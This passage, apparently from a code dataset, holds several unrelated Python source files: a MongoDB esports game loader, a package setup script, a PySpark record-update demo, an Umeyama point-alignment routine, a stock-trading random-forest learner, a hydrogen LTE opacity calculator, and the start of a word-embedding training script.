set()\nfor league in leagues:\n for tournament in league['tournaments']:\n league_tournament_ids.add(tournament['id'])\n\nvalid_tournaments = [tournament for tournament in tournaments if tournament['id'] in league_tournament_ids]\n\n# 4. Insert valid tournaments into the MongoDB collection\nfor tournament in valid_tournaments:\n # Find the league name for this tournament\n for league in leagues:\n if any(t['id'] == tournament['id'] for t in league['tournaments']):\n tournament['league_name'] = league['name']\n break\n\n # Insert the tournament ensuring uniqueness using the tournament's id\n try:\n collection.update_one({'id': tournament['id']}, {\"$set\": tournament}, upsert=True)\n except pymongo.errors.DuplicateKeyError:\n print(f\"Duplicate tournament detected (ID: {tournament['id']}). 
Skipping...\")\n\nprint(\"Insertion complete.\")\n\ngames_collection = db[\"completed_games\"] # This is the collection where completed games_data will be stored\n\n# Query all tournaments\ntournaments = collection.find({})\n\n# Iterate through each tournament, then each stage, each section, and each match to extract game IDs\ngame_ids = []\n\n# Count the games_data that were not completed\nnot_completed_count = 0\nwhat = \"\"\nfor tournament in tournaments:\n tournament_name = tournament.get('slug')\n\n for stage in tournament.get('stages', []):\n for section in stage.get('sections', []):\n for match in section.get('matches', []):\n for game in match.get('games_data', []):\n if game.get('state') == \"completed\":\n game['tournament_name'] = tournament_name # Attach the tournament name to the game\n game['tournament_id'] = tournament['id']\n # Insert the game ensuring uniqueness using the game's id\n try:\n games_collection.update_one({'id': game['id']}, {\"$set\": game}, upsert=True)\n except pymongo.errors.DuplicateKeyError:\n print(f\"Duplicate game detected (ID: {game['id']}). Skipping...\")\n\n what = game.get('state')\n not_completed_count += 1\n game_id = game.get('id')\n if game_id:\n game_ids.append(game_id)\n# Print all the extracted game IDs\nfor game_id in game_ids:\n print(game_id)\n\n# The JSON data\ndata = json.load(open(\"../esports-data/mapping_data.json\", \"r\", encoding=\"utf-8\"))\n\n# Directory containing the nested folders with game files\n\n\n# Extract platformGameId values and convert them to expected filename format\nexpected_files = [entry['platformGameId'].replace(':', '_') + '.json' for entry in data]\n\n\n'''\ncollection = db[\"game_files\"]\ndata = json.load(open(\"../esports-data/mapping_data.json\", \"r\", encoding=\"utf-8\"))\ncompleted_games_collection = db[\"completed_games\"]\nroot_directory = \"../games_data\" # Replace this with the path to your directory\nexpected_files = [entry['platformGameId'].replace(':', '_') + '.json' for entry in data]\n\n\ndef get_tournament_name(game_id):\n games = completed_games_collection.find({})\n for entry in games:\n if entry['id'] == game_id:\n return entry['tournament_name']\n\n\ndef process_game_file(filepath):\n # create a temp json in memory\n temp = {\"events\": [], \"id\": \"\", \"tournament_name\": \"\"}\n game_events = json.load(open(filepath, \"r\", encoding=\"utf-8\"))\n second = 0\n gameEnd = False\n for event in game_events:\n if event.get(\"eventType\") != \"stats_update\":\n gameEnd = event.get(\"gameOver\")\n temp.get(\"events\").append(event)\n else:\n second += 1\n if second % 60 == 0:\n temp.get(\"events\").append(event)\n if gameEnd:\n print(\"game end\")\n temp.get(\"events\").append(event)\n\n return temp\n\n\ngame_files_collection = db[\"game_files\"]\ngame_files = game_files_collection.find({})\ncount = 0\n# Traverse the directory to find and read the matching game files\nfor subdir, _, files in os.walk(root_directory):\n for i, file in enumerate(files):\n if file in expected_files:\n filepath = os.path.join(subdir, file)\n filepath = filepath[-26:-5].replace(\"_\", \":\") # Remove the \"../games_data\" prefix\n\n times = time.time()\n\n for entry in data:\n if entry['platformGameId'] == filepath:\n esports_game_id = entry['esportsGameId']\n print(f\"Found matching game file: {filepath} (esportsGameId: {esports_game_id})\")\n print(f\"Finding matching game file took: {time.time() - times}\")\n times = time.time()\n # Check if the specific ID exists in the collection\n\n result = 
game_files_collection.find_one({'id': esports_game_id}, {'_id': 1}) is not None\n print(f\"Finding matching game file from collection took: {time.time() - times}\")\n times = time.time()\n\n if result:\n count = count + 1\n if count % 10 == 0:\n print(f\"count: {count} Game file with ID {esports_game_id} already exists. Skipping...\")\n break\n jsons = process_game_file(os.path.join(subdir, file))\n print(f\"Processing game file took: {time.time() - times}\")\n times = time.time()\n jsons[\"id\"] = esports_game_id\n jsons[\"tournament_name\"] = get_tournament_name(esports_game_id)\n collection.update_one({\"id\": esports_game_id}, {\"$set\": jsons}, upsert=True)\n print(f\"Inserting game file took: {time.time() - times}\")\n times = time.time()\n print(f\"Processing file {i + 1} of {len(files)}: {filepath}\")\n\n\nprint(\"Insertion of matching game files complete.\")\n\nclient.close()\n","repo_name":"haoyanwan/GlobalPowers","sub_path":"src/database/parse_data.py","file_name":"parse_data.py","file_ext":"py","file_size_in_byte":7674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29559495880","text":"try:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nfrom notiondict import __version__\n\n\nwith open('README.rst') as readme_file:\n readme = readme_file.read()\n\nrequirements = [\n 'readmdict',\n 'requests',\n 'docopt',\n 'pyclip',\n 'PyYAML'\n\n]\n\nsetup(\n name='notiondict',\n version=__version__,\n description='A high customized dictionary',\n long_description=readme,\n author='Pixelhegel',\n author_email='Pixelhegel@gmail.com',\n url='https://github.com/pixelhegel/notiondict',\n packages=[\n 'notiondict',\n ],\n package_dir={'notiondict':\n 'notiondict'},\n include_package_data=True,\n package_data={'': ['config.yml','get_active_window_title_macos.scpt']},\n install_requires=requirements,\n license='Apache License',\n zip_safe=False,\n keywords='dictionary notification tool',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n ],\n test_suite='tests',\n entry_points={\n 'console_scripts': [\n 'notiondict=notiondict.notiondict:main',\n ],\n },\n)","repo_name":"PixelHegel/NotionDict","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"8302058620","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col, max, when\n\n# Initialize Spark session\nspark = SparkSession.builder.appName(\"RawInterfaceProcessing\").getOrCreate()\n\n# Sample data for validated_records\nvalidated_records_data = [\n (1, \"cis1\", \"entity1\", \"model1\", \"v1\", \"seg1\", \"grade1\", 0.2, \"Y\", \"Country1\", \"2023-01-01\"),\n (2, \"cis2\", \"entity2\", \"model2\", \"v2\", \"seg2\", \"grade2\", 0.3, \"N\", \"Country2\", \"2023-01-02\"),\n # Add more data as needed\n]\n\n# Sample data for raw_interface\nraw_interface_data = [\n (\"01-01-2023\", \"cp1\", \"postcrm1\", \"precrm1\", \"col1\", \"col2\"),\n (\"01-02-2023\", \"cp2\", \"postcrm2\", \"precrm2\", \"col1\", \"col2\"),\n # Add 5 more records\n 
(\"01-03-2023\", \"cp3\", \"postcrm3\", \"precrm3\", \"col1\", \"col2\"),\n (\"01-07-2023\", \"cp4\", \"postcrm4\", \"precrm4\", \"col1\", \"col2\"),\n (\"01-07-2023\", \"cp5\", \"postcrm5\", \"precrm5\", \"col1\", \"col2\"),\n (\"01-07-2023\", \"cis1\", \"postcrm6\", \"precrm6\", \"col1\", \"col2\"),\n (\"01-07-2023\", \"cis2\", \"postcrm7\", \"precrm7\", \"col1\", \"col2\"),\n]\n\n# Create DataFrames\nvalidated_records_df = spark.createDataFrame(validated_records_data, [\"sl_no\", \"cis_code\", \"entity_name\", \"model_name\", \"model_version\", \"segment\", \"definitive_grade\", \"definitive_pd\", \"cascade_flag\", \"country_of_operations\", \"last_grading_date\"])\nraw_interface_df = spark.createDataFrame(raw_interface_data, [\"day_rk\", \"counterparty_id\", \"pd_score_postcrm\", \"pd_score_precrm\", \"col1\", \"col2\"])\n\n\n\n# 1. Copy raw_interface to \"raw_interface_new\" temp dataframe\nraw_interface_new_df = raw_interface_df\n\n# 2. Print total number of records in \"raw_interface_new\"\nprint(f'Total no of records in \"raw_interface_new\" now: {raw_interface_new_df.count()}')\n\n# 3. Get max_day = max(day_rk) and display max day_rk\nmax_day = raw_interface_new_df.select(max(col(\"day_rk\"))).first()[0]\nprint(f'Max day_rk is: {max_day}')\n\n# 4. Create \"raw_interface_new_max_day_rk_data\" from \"raw_interface_new\" where day_rk = max_day\nraw_interface_new_max_day_rk_data = raw_interface_new_df.filter(col(\"day_rk\") == max_day)\n\n# 5. Print total number of records in \"raw_interface_new_max_day_rk_data\"\nprint(f'Total no of records in \"raw_interface_new_max_day_rk_data\": {raw_interface_new_max_day_rk_data.count()}')\n\n# 6. Create \"raw_interface_new_non_max_day_rk_data\" from \"raw_interface_new\" where day_rk not equal max_day\nraw_interface_new_non_max_day_rk_data = raw_interface_new_df.filter(col(\"day_rk\") != max_day)\n\n# 7. Print total number of records in \"raw_interface_new_non_max_day_rk_data\"\nprint(f'Total no of records in \"raw_interface_new_non_max_day_rk_data\": {raw_interface_new_non_max_day_rk_data.count()}')\n\n# 8. 
Display raw_interface_new_max_day_rk_data and raw_interface_new_non_max_day_rk_data records\nprint(\"Records in raw_interface_new_non_max_day_rk_data:\")\nraw_interface_new_non_max_day_rk_data.show(truncate=False)\n\n\n# Display validated_records records\nprint(\"Records in validated_records:\")\nvalidated_records_df.show(truncate=False)\nprint(\"Records in raw_interface_new_max_day_rk_data:\")\nraw_interface_new_max_day_rk_data.show(truncate=False)\n\n# Join the dataframes to get the necessary columns\njoined_df = raw_interface_new_max_day_rk_data.join(\n validated_records_df.select(\"cis_code\", \"definitive_pd\"),\n col(\"counterparty_id\") == col(\"cis_code\"),\n \"left_outer\"\n)\n\njoined_df.show(truncate=False)\n# Update the columns based on the condition\nupdated_raw_interface = joined_df.withColumn(\n \"pd_score_postcrm\", when(col(\"cis_code\").isNotNull(), col(\"definitive_pd\")).otherwise(col(\"pd_score_postcrm\"))\n).withColumn(\n \"pd_score_precrm\", when(col(\"cis_code\").isNotNull(), col(\"definitive_pd\")).otherwise(col(\"pd_score_precrm\"))\n).drop(\"cis_code\", \"definitive_pd\")\n\n# Display updated records\nupdated_raw_interface.show(truncate=False)\n\n# Stop Spark session\nspark.stop()\n","repo_name":"kasaram/d1","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":3819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13376049521","text":"import numpy as np\n\n\ndef umeyama(src, dst, estimate_scale):\n \"\"\"Estimate N-D similarity transformation with or without scaling.\n Parameters\n ----------\n src : (M, N) array\n Source coordinates.\n dst : (M, N) array\n Destination coordinates.\n estimate_scale : bool\n Whether to estimate scaling factor.\n Returns\n -------\n T : (N + 1, N + 1)\n The homogeneous similarity transformation matrix. The matrix contains\n NaN values only if the problem is not well-conditioned.\n References\n ----------\n .. [1] \"Least-squares estimation of transformation parameters between two\n point patterns\", Shinji Umeyama, PAMI 1991, DOI: 10.1109/34.88573\n \"\"\"\n\n num = src.shape[0]\n dim = src.shape[1]\n\n # Compute mean of src and dst.\n src_mean = src.mean(axis=0)\n dst_mean = dst.mean(axis=0)\n\n # Subtract mean from src and dst.\n src_demean = src - src_mean\n dst_demean = dst - dst_mean\n\n # Eq. (38).\n A = np.dot(dst_demean.T, src_demean) / num\n\n # Eq. (39).\n d = np.ones((dim,), dtype=np.double)\n if np.linalg.det(A) < 0:\n d[dim - 1] = -1\n\n T = np.eye(dim + 1, dtype=np.double)\n\n U, S, V = np.linalg.svd(A)\n\n # Eq. (40) and (43).\n rank = np.linalg.matrix_rank(A)\n if rank == 0:\n return np.nan * T\n elif rank == dim - 1:\n if np.linalg.det(U) * np.linalg.det(V) > 0:\n T[:dim, :dim] = np.dot(U, V)\n else:\n s = d[dim - 1]\n d[dim - 1] = -1\n T[:dim, :dim] = np.dot(U, np.dot(np.diag(d), V))\n d[dim - 1] = s\n else:\n T[:dim, :dim] = np.dot(U, np.dot(np.diag(d), V.T))\n\n if estimate_scale:\n # Eq. 
(41) and (42).\n scale = 1.0 / src_demean.var(axis=0).sum() * np.dot(S, d)\n else:\n scale = 1.0\n\n # the Python umeyama implementation gets a wrong rotation in some unknown conditions,\n # so we compare the two results and choose the one with the minimum loss;\n # this will be fixed in the future\n homo_src = np.insert(src, 3, 1, axis=1).T\n rot = T[:dim, :dim]\n\n rots = []\n losses = []\n for i in range(2):\n if i == 1:\n rot[:, :2] *= -1\n transform = np.eye(dim + 1, dtype=np.double)\n transform[:dim, :dim] = rot * scale\n transform[:dim, dim] \\\n = dst_mean - scale * np.dot(T[:dim, :dim], src_mean.T)\n transed = np.dot(transform, homo_src).T[:, :3]\n loss = np.linalg.norm(transed - dst)\n losses.append(loss)\n rots.append(rot.copy())\n # T[:dim, dim] = dst_mean - scale * np.dot(T[:dim, :dim], src_mean.T)\n # T[:dim, :dim] *= scale\n # print(T)\n\n # since only the SMPL parameters are needed,\n # we return rotation, translation and scale\n trans = dst_mean - scale * np.dot(T[:dim, :dim], src_mean.T)\n if losses[0] > losses[1]:\n rot = rots[1]\n else:\n rot = rots[0]\n\n return rot, trans, scale\n","repo_name":"sail-sg/mvp","sub_path":"lib/smpl/umeyama.py","file_name":"umeyama.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":296,"dataset":"github-code","pt":"21"} +{"seq_id":"43497456415","text":"\"\"\"\nTemplate for implementing StrategyLearner (c) 2016 Tucker Balch\n\"\"\"\n\nimport datetime as dt\nimport pandas as pd\nimport numpy as np\nimport util as ut\nimport random\nimport math\nimport marketsimcode\nfrom math import floor\nfrom sklearn import ensemble\nimport matplotlib.pyplot as plt\n\n\nclass SingleStockAnalysis(object):\n def author(self):\n return \"msaqib3\"\n\n # constructor\n def __init__(self, verbose=False, impact=0.0, ybuy=0.00, rfThresh=0.1):\n '''\n verbose\n impact: how much impact does trade have\n ybuy: threshold for buying (and conversely negative for shorting) (generates Y)\n rfThresh: threshold to go all out\n '''\n self.verbose = verbose\n self.impact = impact\n self.ybuy = ybuy\n self.drLearner = ensemble.RandomForestRegressor(150)\n self.volLearner = ensemble.RandomForestRegressor(150)\n self.rfThresh = rfThresh\n\n # this method should create a RTLearner, and train it for trading\n def addEvidence(self, symbol=\"IBM\",\n sd=dt.datetime(2008, 1, 1),\n ed=dt.datetime(2009, 1, 1),\n sv=10000):\n # add your code to do learning here\n\n # example usage of the old backward compatible util function\n syms = [symbol]\n dates = pd.date_range(sd, ed)\n prices_all = ut.get_data(syms, dates) # automatically adds SPY\n prices = prices_all[syms] # only portfolio symbols\n if self.verbose: print(prices)\n\n # example use with new colname\n volume_all = ut.get_data(syms, dates, colname=\"Volume\") # automatically adds SPY\n volume = volume_all[symbol] # only portfolio symbols\n\n # generate some technical statistics on stock data\n high = ut.get_data(syms, dates, colname=\"High\", addSPY=False)[symbol]\n low = ut.get_data(syms, dates, colname=\"Low\", addSPY=False)[symbol]\n\n X, Y = self.genStats(prices[symbol], volume, high, low)\n # print(Y)\n\n self.drLearner.fit(X, Y)\n\n def genStats(self, price, volume, high, low):\n '''\n Generates X and Y for data\n '''\n # prices_all[\"Y\"] = Y\n changeVol = (volume.shift(1)) / volume.iloc[0]\n dr = (price.shift(-1)) / price - 1 # return for 1 day in future if you invested today\n\n # print \"dr\", dr.mean()\n dr = dr.fillna(method='ffill').fillna(method=\"bfill\")\n Y = dr * 100 # percentageReturn\n drChange = 
dr.shift(3) - dr.shift(2) # these are actually adj close values, so dr.shift(1) would still use the adj close of the current day, leading to an information leak\n momentum = (dr.shift(3) - dr.shift(2)) / dr.shift(2)\n momentum = momentum.fillna(method=\"ffill\").fillna(method=\"bfill\")\n intraDaySpread = (high.shift(1) - low.shift(1)) / price\n\n movingAverage = price.rolling(5).mean().fillna(method=\"ffill\").fillna(method=\"bfill\")\n movingStd = price.rolling(5).std().fillna(method=\"ffill\").fillna(method=\"bfill\")\n moving_z_score = (price - movingAverage) / movingStd\n movingVolStd = volume.rolling(5).std().fillna(method='ffill').fillna(method='bfill')\n X = pd.DataFrame([moving_z_score, movingStd, momentum, changeVol, movingVolStd, drChange, dr.shift(2), intraDaySpread])\n X = X.replace([np.inf, -np.inf], np.nan)\n X = X.fillna(method='ffill').fillna(method='bfill').values\n return X.T, Y\n\n # this method should use the existing policy and test it against new data\n def testPolicy(self, symbol=\"IBM\",\n sd=dt.datetime(2009, 1, 1),\n ed=dt.datetime(2010, 1, 1),\n sv=10000):\n dates = pd.date_range(sd, ed)\n prices_all = ut.get_data([symbol], dates) # automatically adds SPY\n volumes_all = ut.get_data([symbol], dates, colname=\"Volume\")\n high = ut.get_data([symbol], dates, colname=\"High\", addSPY=False)[symbol]\n low = ut.get_data([symbol], dates, colname=\"Low\", addSPY=False)[symbol]\n\n X, _ = self.genStats(prices_all[symbol], volumes_all[symbol], high, low)\n Ypred = self.drLearner.predict(X)\n Ypred = pd.Series(Ypred, index=prices_all.index)\n\n trades = pd.DataFrame(index=dates, columns=[symbol])\n\n trades.loc[trades.index[1:], symbol] = Ypred[1:].apply(\n lambda x: 1 if x > self.rfThresh else 0 if x < - self.rfThresh else np.nan) # position\n trades.loc[trades.index[-1], symbol] = 0 # we end at 0 shares\n trades.loc[trades.index[0], symbol] = 0 # we start at 0 shares\n trades = trades.fillna(method=\"ffill\").fillna(method=\"bfill\")\n trades[symbol] = - (trades.shift(\n 1) - trades) # subtract the previous position from the current one to get the change to the portfolio (trades)\n trades[symbol].iloc[0] = 0\n trades = trades * 1\n return trades\n\n\nif __name__ == \"__main__\":\n print(\"One does not simply think up a strategy\")\n\n sl = SingleStockAnalysis()\n symbol = \"AAPL\"\n sd = dt.datetime(2009, 1, 1)\n md = dt.datetime(2012, 12, 29)\n ed = dt.datetime(2019, 4, 20)\n prices = ut.get_data([symbol], pd.date_range(md, ed))[symbol]\n sv = prices[md]\n sl.addEvidence(symbol=symbol, sd=sd, ed=md - dt.timedelta(days=1), sv=sv)\n # sl.addEvidence(symbol=symbol, sd=md, ed=ed, sv=sv)\n trades = sl.testPolicy(symbol=symbol, sd=md, ed=ed, sv=sv)\n results = (marketsimcode.compute_portvals(trades, commission=0, impact=0, start_val=sv)[1])\n plt.plot(results.index, results/results.iloc[0])\n plt.plot(prices.index, prices/prices.iloc[0])\n plt.legend([\"Learner\", \"Benchmark\"])\n plt.show()\n print(\"Strategy Percent Return {}\".format((results.iloc[-1]/sv - 1) * 100))\n print(\"Benchmark Percent Return {}\".format((prices.iloc[-1]/prices[0] - 1) * 100))\n","repo_name":"Saqibm128/ML4TradingStockTrader","sub_path":"server/StrategyLearner.py","file_name":"StrategyLearner.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17548947162","text":"# -*- encoding: utf-8 -*-\n\"\"\"\nProgram to compute the LTE opacity of hydrogen\n\nWilliam Henney - 06 Mar 2012\n\nStellar Astrophysics Course - 2012-II - Homework 
03\n\"\"\"\n\nimport numpy as np\nfrom numpy import exp\n\n# \n# Physical constants\n#\n# # Units\n# # -------- \nBOLTZMANN_CGS = 1.3806503e-16 # erg/K\nEV_CGS = 1.602176462e-12 # erg/eV\nANGSTROM_CGS = 1.e-8 # cm\nLIGHTSPEED_CGS = 2.99792458e10 # cm/s\nPLANCK_CGS = 6.62606876e-27 # erg/s\nMASA_PROTON = 1.67262158e-24 # g\n\nBOLTZMANN = BOLTZMANN_CGS / EV_CGS # eV/K\nPLANCK = PLANCK_CGS / EV_CGS # eV/s\nRYDBERG = 13.6 # eV\nHMINUS_EION = 0.754 # eV\n\n# H0 partition function (assumed constant)\nH0_U = 2.0\ndef H0_level_population(n, T):\n \"\"\"\n Compute the LTE population of level n of neutral hydrogen\n at a temperature of T kelvin\n \"\"\"\n # Excitation energy relative to n=1\n E = RYDBERG * (1.0 - 1.0/n**2)\n # Statistical weight\n g = 2.0*n**2\n return (g/H0_U)*exp(-E/(BOLTZMANN*T))\n\ndef Saha_Phi(Eion, Ui, Un, T):\n \"\"\"\n Saha function Phi(T) = (Ni Ne / Nn)\n for ionization energy Eion,\n with partition functions Ui and Un\n \"\"\"\n return 4.8293744908e15 * (Ui/Un) * T**1.5 * exp(-Eion/(BOLTZMANN*T))\n\ndef Saha_Phi_H0Hplus(T):\n return Saha_Phi(RYDBERG, H0_U, H0_U, T)\n\ndef Saha_Phi_HminusH0(T):\n return Saha_Phi(HMINUS_EION, H0_U, 1.0, T)\n\n@np.vectorize\ndef Hplus_fraction(Hden, T):\n \"\"\"\n Compute the ionized hydrogen fraction\n \"\"\"\n A = Saha_Phi_H0Hplus(T) / Hden\n # Solve the polynomial: y**2 + A*y - A = 0\n y = np.roots([1.0, A, -A])[1] # take the positive root\n return y\n\ndef Hminus_fraction(Hden, T):\n \"\"\"\n Compute the fraction of the negative hydrogen ion\n \"\"\" \n y = Hplus_fraction(Hden, T)\n return y * (1. - y) * Hden/Saha_Phi_HminusH0(T)\n\n\n\"\"\"\nSolving ion balance for hydrogen:\n\nn+ + n- + n0 = n\n(ne n+ / n0) = Phi1(T)\n(ne n0 / n-) = Phi2(T)\nne = n+ - n-\n\nAssume that n- abundance is always negligible\n\nThen ionized fraction y = n+/n obeys the quadratic equation\n\ny**2 + A*y - A = 0\n\nwhere A = Phi1(T)/n\n\"\"\"\n\n# Cross section of H0 n=1 at E = 1 Rydberg (Gray, Eq. 8.4)\n# (assume Gaunt factor = 1)\nXSEC0 = 7.92609446707e-18 # cm^2/H atom\n@np.vectorize\ndef xsec_H0_boundfree(n, nu):\n \"\"\"\n Photoionization cross section of level n of H0 at frequency nu Hz\n\n Multiply by the density of H0(n) to give the absorption coefficient (cm^{-1})\n \"\"\"\n E = PLANCK*nu # photon energy\n E0 = RYDBERG/n**2 # ionization energy of level n\n\n if E >= E0:\n xsec = XSEC0*n*(E0/E)**3\n else:\n xsec = 0.0\n\n return xsec\n\ndef xsec_H0_freefree(T, nu):\n \"\"\"\n Bremsstrahlung cross section per electron at frequency nu Hz\n\n Multiply by Ne N(H+) to give the absorption coefficient (cm^{-1})\n \"\"\"\n return 0.018 * T**-1.5 / nu**2 # Rybicki, eq. 5.19b\n\n@np.vectorize\ndef xsec_Hminus_boundfree(nu):\n \"\"\"\n Photoionization cross section of the negative ion H- at frequency nu Hz\n\n Multiply by N(H-) to give the absorption coefficient (cm^{-1})\n \"\"\"\n wav = LIGHTSPEED_CGS / (nu * 1.e4 * ANGSTROM_CGS) # lambda in units of 10,000 Å (1 micron)\n # Formula and constants from Gray, Eq. 
8.11\n A = [1.99654, -1.18267e-1, 2.64243e2, -4.40524e2, 3.23992e2, -1.39568e2, 2.78701e1]\n xsec = 0.0\n # The fit is accurate for 2250 Å <= lambda <= 15,000 Å \n # It must be cut off beyond 16,200 Å because the fit goes negative\n for i, a in enumerate(A):\n if wav <= 1.62:\n xsec += a*wav**i\n return xsec * 1.e-18\n\n@np.vectorize\ndef xsec_Hminus_freefree(T, nu):\n \"\"\"\n Free-free opacity of the negative ion H- at frequency nu Hz\n\n Multiply by Pe N(H0) to give the absorption coefficient (cm^{-1})\n + Note that it must NOT be multiplied by N(H-)\n + And this already includes the correction for stimulated emission\n \"\"\"\n wav = LIGHTSPEED_CGS / (nu * ANGSTROM_CGS) # lambda in units of Å\n # if 2600.0 <= wav <= 113900.0:\n logwav = np.log10(wav)\n # Eq. 8.13 of Gray\n f0 = -2.2763 - 1.6850*logwav + 0.76661*logwav**2 - 0.053346*logwav**3\n f1 = 15.2827 - 9.2846*logwav + 1.99381*logwav**2 - 0.142631*logwav**3\n f2 = -197.789 + 190.266*logwav - 67.9775*logwav**2 + 10.6913*logwav**3 - 0.625151*logwav**4\n theta = np.log10(np.e) / (BOLTZMANN*T) # approximately theta = 5040/T\n xsec = 1.e-26 * 10**(f0 + f1*np.log10(theta) + f2*np.log10(theta)**2)\n # else:\n # xsec = 0.0\n return xsec\n\n\ndef funcPe(Hden, T):\n \"\"\"\n Electron pressure as a function of total density and temperature\n \"\"\"\n return Hden*Hplus_fraction(Hden, T)*BOLTZMANN_CGS*T\n\ndef funcHden(Pe, T):\n \"\"\"\n Total density as a function of Pe and T\n\n This function numerically finds the root for Hden of the function\n\n funcPe(Hden, T) - Pe = 0\n\n starting from a first guess that assumes 50% ionization\n \"\"\"\n from scipy.optimize import fsolve\n Hden0 = 0.5*Pe / (BOLTZMANN_CGS*T) # first guess is 50% ionized\n return fsolve(lambda Hden: funcPe(Hden, T) - Pe, Hden0)[0]\n\nNMAX = 20 # Highest H0 quantum level to consider\ndef opacidad_total(Hden, T, nu):\n \"\"\"\n Compute the total continuum opacity of a pure-H gas in LTE\n\n Input parameters:\n \n Hden : total hydrogen density (cm^{-3})\n T : temperature (K)\n nu : frequency (Hz)\n\n Result: \n\n opacities: dict with the absorption coefficient per mass (cm^2/g)\n elements are \"Total\", \"H0bf\", \"H0ff\", \"Hmbf\", \"Hmff\"\n \"\"\"\n\n y = Hplus_fraction(Hden, T) # ionization fraction\n Hpden = y*Hden # density of H+\n eden = y*Hden # density of electrons\n Pe = funcPe(Hden, T) # electron pressure\n H0den = (1.0 - y)*Hden # density of H0\n Hmden = Hden*Hminus_fraction(Hden, T) # density of H-\n\n stimulated_correction = (1.0 - np.exp(-PLANCK_CGS*nu / (BOLTZMANN_CGS*T)))\n opacities = dict()\n \n # H0 bound-free\n opacities[\"H0bf\"] = 0.0\n for n in range(1, NMAX+1):\n opacities[\"H0bf\"] += H0den * H0_level_population(n, T) * xsec_H0_boundfree(n, nu)\n opacities[\"H0bf\"] *= stimulated_correction\n # H0 free-free\n opacities[\"H0ff\"] = Hpden * eden * xsec_H0_freefree(T, nu)\n opacities[\"H0ff\"] *= stimulated_correction\n # H- bound-free\n opacities[\"Hmbf\"] = Hmden * xsec_Hminus_boundfree(nu)\n opacities[\"Hmbf\"] *= stimulated_correction \n # H- free-free (which already includes stimulated emission)\n opacities[\"Hmff\"] = H0den * Pe * xsec_Hminus_freefree(T, nu)\n\n # convert to opacity per mass\n total = 0.0\n for k in opacities.keys():\n opacities[k] /= Hden*MASA_PROTON\n total += opacities[k]\n opacities[\"Total\"] = total\n return 
opacities\n","repo_name":"will-henney/lte-opacities","sub_path":"lteopacity.py","file_name":"lteopacity.py","file_ext":"py","file_size_in_byte":7153,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33766897981","text":"from app.ecommerce.address.repository.address_repository import (\n AddressRepository\n)\nfrom app.core.error.response import (\n ResponseFailure,\n ResponseTypes,\n build_response_from_invalid_request\n)\n\nrepository = AddressRepository()\n\n\ndef address_create_use_case(req):\n \n if not req:\n return build_response_from_invalid_request(invalid_request=req)\n try:\n return repository.create_address(data=req.data)\n \n except Exception as exec:\n return ResponseFailure(ResponseTypes.SYSTEM_ERROR, exec)\n","repo_name":"RxMobile-Dummy/python-ecommerce-clean-architecture","sub_path":"app/ecommerce/address/use_cases/address_create_use_case.py","file_name":"address_create_use_case.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25942242126","text":"#!/usr/bin/env python3\n\"\"\"Sample script of word embedding model.\n\nThis module implements skip-gram model and continuous-bow model.\n\n\"\"\"\nimport argparse\nimport chainer\nfrom chainer import cuda\nimport chainer.functions as F\nimport chainer.links as L\nfrom timeit import default_timer as timer\nfrom chainer import training\nfrom chainer.training import extensions\nimport logging\nimport os\nimport vecto\nfrom pathlib import Path\nfrom vecto.embeddings.dense import WordEmbeddingsDense\nfrom vecto.vocabulary import Vocabulary\nfrom vecto.vocabulary.vocabulary import create_from_path, create_ngram_tokens_from_dir, create_from_annotated_dir\nfrom vecto.embeddings import utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', '-g', default=-1, type=int,\n help='GPU ID (negative value indicates CPU)')\n parser.add_argument('--dimensions', '-d', default=100, type=int,\n help='number of dimensions')\n parser.add_argument('--context_type', '-ct', choices=['linear', 'deps'],\n default='linear',\n help='context type, for deps context, the annotated corpus is required')\n parser.add_argument('--context_representation', '-cp', choices=['word', 'deps', 'pos', 'posit', 'lr'],\n # todo lr posit, interation for deps\n default='word',\n help='context representation, for deps (dependency information) and ne (named entity), '\n 'the annotated corpus is required')\n parser.add_argument('--window', '-w', default=2, type=int,\n help='window size')\n parser.add_argument('--batchsize', '-b', type=int, default=1000,\n help='learning minibatch size')\n parser.add_argument('--epoch', '-e', default=1, type=int,\n help='number of epochs to learn')\n parser.add_argument('--model', '-m', choices=['skipgram', 'cbow'],\n default='skipgram', help='model type (\"skipgram\", \"cbow\")')\n parser.add_argument('--language', '-lang', choices=['eng', 'jap'],\n default='eng', help='the language, current only support english and japanese')\n parser.add_argument('--subword', '-sw',\n choices=['none', '_none', 'cnn1d', 'cnn1d_small', 'lstm', 'lstm_sum', 'bilstm', 'bilstm_sum',\n 'avg', 'sum'],\n default='none',\n help='specify if subword-level approach should be used ')\n parser.add_argument('--negative-size', default=5, type=int,\n help='number of negative samples')\n parser.add_argument('--min_gram', default=1, 
